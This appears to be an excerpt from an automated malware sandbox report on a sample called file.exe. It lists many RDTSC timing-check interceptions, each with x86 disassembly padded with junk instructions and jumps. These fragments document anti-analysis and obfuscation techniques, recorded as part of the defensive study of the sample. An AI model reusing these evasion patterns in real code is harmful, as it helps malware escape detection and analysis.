            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C567C second address: 7C568D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jg 00007F377CE4798Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEEF3 second address: 7DEEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEEF7 second address: 7DEF03 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEF03 second address: 7DEF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEF07 second address: 7DEF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEF0B second address: 7DEF17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F377C5325E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEF17 second address: 7DEF24 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DEF24 second address: 7DEF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325EBh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF1CF second address: 7DF1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DF1D3 second address: 7DF1F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2410 second address: 7E2416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52E8 second address: 7E52F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52F3 second address: 7E531F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47993h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F377CE47991h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E531F second address: 7E5324 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5324 second address: 7E535D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F377CE47999h 0x00000013 jmp 00007F377CE47991h 0x00000018 popad 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E666A second address: 7E6670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6670 second address: 7E6675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E83CC second address: 7E83D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E83D1 second address: 7E83E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F377CE4798Eh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0EC8 second address: 52B0ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0ECE second address: 52B0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0ED2 second address: 52B0ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0ED6 second address: 52B0F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [eax+00000FDCh] 0x0000000e jmp 00007F377CE47999h 0x00000013 test ecx, ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 mov edi, 7B8B8C0Eh 0x0000001c pop edi 0x0000001d mov di, cx 0x00000020 popad 0x00000021 jns 00007F377CE479B7h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov cx, 3F79h 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0F18 second address: 52B0F73 instructions: 0x00000000 rdtsc 0x00000002 mov cl, 5Ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F377C5325EBh 0x0000000b popad 0x0000000c add eax, ecx 0x0000000e jmp 00007F377C5325F6h 0x00000013 mov eax, dword ptr [eax+00000860h] 0x00000019 jmp 00007F377C5325F0h 0x0000001e test eax, eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F377C5325F7h 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0F73 second address: 52B0F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47994h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDDF3 second address: 6FDDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE03C second address: 6FE040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE040 second address: 6FE046 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE046 second address: 6FE04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D0385 second address: 52D038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D038B second address: 52D03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F377CE47997h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03B5 second address: 52D03CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325F4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03CD second address: 52D03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03D1 second address: 52D03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D040C second address: 52D041C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE4798Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0837 second address: 52C083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C083B second address: 52C0841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0841 second address: 52C0891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 9460h 0x00000011 pushfd 0x00000012 jmp 00007F377C5325F9h 0x00000017 xor si, A166h 0x0000001c jmp 00007F377C5325F1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0891 second address: 52C096D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F377CE47991h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F377CE4798Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b call 00007F377CE47993h 0x00000020 call 00007F377CE47998h 0x00000025 pop esi 0x00000026 pop ebx 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 pushad 0x0000002a jmp 00007F377CE4798Ch 0x0000002f pushfd 0x00000030 jmp 00007F377CE47992h 0x00000035 xor cl, 00000058h 0x00000038 jmp 00007F377CE4798Bh 0x0000003d popfd 0x0000003e popad 0x0000003f push eax 0x00000040 jmp 00007F377CE47999h 0x00000045 xchg eax, ecx 0x00000046 jmp 00007F377CE4798Eh 0x0000004b xchg eax, esi 0x0000004c jmp 00007F377CE47990h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C096D second address: 52C0971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0971 second address: 52C0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0975 second address: 52C097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C097B second address: 52C09AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F377CE47996h 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C09AD second address: 52C09C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F377C5325F3h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C09C6 second address: 52C09FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 2A61BDABh 0x00000008 pushfd 0x00000009 jmp 00007F377CE47990h 0x0000000e or esi, 45FC8738h 0x00000014 jmp 00007F377CE4798Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e pushad 0x0000001f pushad 0x00000020 mov cx, A281h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C09FD second address: 52C0A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov al, 03h 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 1082CF7Bh 0x0000000f pushfd 0x00000010 jmp 00007F377C5325F0h 0x00000015 add ax, 00C8h 0x0000001a jmp 00007F377C5325EBh 0x0000001f popfd 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F377C5325F6h 0x00000027 push dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F377C5325EDh 0x00000033 and cl, FFFFFF96h 0x00000036 jmp 00007F377C5325F1h 0x0000003b popfd 0x0000003c call 00007F377C5325F0h 0x00000041 pop ecx 0x00000042 popad 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B22 second address: 52C0B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B26 second address: 52C0B2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B2C second address: 52C0B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0199 second address: 52C01C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F377C5325F7h 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dh, DBh 0x00000013 mov ah, E6h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01C8 second address: 52C01CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01CC second address: 52C01D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01D0 second address: 52C01D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01D6 second address: 52C01FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01FB second address: 52C01FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01FF second address: 52C0212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0212 second address: 52C02F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 call 00007F377CE47990h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push FFFFFFFEh 0x00000011 jmp 00007F377CE47991h 0x00000016 push 50755C89h 0x0000001b jmp 00007F377CE47997h 0x00000020 xor dword ptr [esp], 25B3C2C1h 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F377CE47994h 0x0000002e adc ax, 1538h 0x00000033 jmp 00007F377CE4798Bh 0x00000038 popfd 0x00000039 mov ch, CFh 0x0000003b popad 0x0000003c push 703ED616h 0x00000041 jmp 00007F377CE47990h 0x00000046 add dword ptr [esp], 0582555Ah 0x0000004d jmp 00007F377CE47990h 0x00000052 mov eax, dword ptr fs:[00000000h] 0x00000058 pushad 0x00000059 call 00007F377CE4798Eh 0x0000005e pushfd 0x0000005f jmp 00007F377CE47992h 0x00000064 sub ax, 9128h 0x00000069 jmp 00007F377CE4798Bh 0x0000006e popfd 0x0000006f pop ecx 0x00000070 push eax 0x00000071 push edx 0x00000072 mov edi, 6EF58FCAh 0x00000077 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02F9 second address: 52C033F instructions: 0x00000000 rdtsc 0x00000002 mov di, DE96h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F377C5325EAh 0x0000000f mov dword ptr [esp], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov al, dl 0x00000017 pushfd 0x00000018 jmp 00007F377C5325F6h 0x0000001d or ecx, 4158A5E8h 0x00000023 jmp 00007F377C5325EBh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0436 second address: 52C043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C043A second address: 52C0455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0455 second address: 52C045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C045B second address: 52C045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C045F second address: 52C0477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0477 second address: 52C047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C047B second address: 52C048D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C048D second address: 52C04A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A3 second address: 52C04A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A7 second address: 52C04AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04AD second address: 52C04E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F377CE4798Eh 0x00000011 xor cl, FFFFFFD8h 0x00000014 jmp 00007F377CE4798Bh 0x00000019 popfd 0x0000001a movzx eax, dx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ah, bl 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04E8 second address: 52C0521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov dx, D2E4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F377C5325F4h 0x00000016 sub si, B598h 0x0000001b jmp 00007F377C5325EBh 0x00000020 popfd 0x00000021 mov ah, 4Fh 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0521 second address: 52C0527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0527 second address: 52C052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C052B second address: 52C052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C052F second address: 52C055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [75C74538h] 0x0000000d jmp 00007F377C5325F8h 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov cx, 6EC3h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C055E second address: 52C05A9 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 34h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bl, BAh 0x00000008 popad 0x00000009 xor eax, ebp 0x0000000b jmp 00007F377CE4798Dh 0x00000010 nop 0x00000011 jmp 00007F377CE4798Eh 0x00000016 push eax 0x00000017 jmp 00007F377CE4798Bh 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F377CE47995h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05A9 second address: 52C05EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F377C5325EEh 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F377C5325F7h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05EE second address: 52C0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47994h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0606 second address: 52C060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C060A second address: 52C061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C061B second address: 52C061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C061F second address: 52C0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0623 second address: 52C0629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0629 second address: 52C067E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F377CE4798Bh 0x00000018 xor si, BBFEh 0x0000001d jmp 00007F377CE47999h 0x00000022 popfd 0x00000023 call 00007F377CE47990h 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C067E second address: 52C06A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1A9F3C0Dh 0x00000008 call 00007F377C5325EAh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ecx, dword ptr [eax+00000FDCh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06A0 second address: 52C06BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47996h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06BA second address: 52C06CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test ecx, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
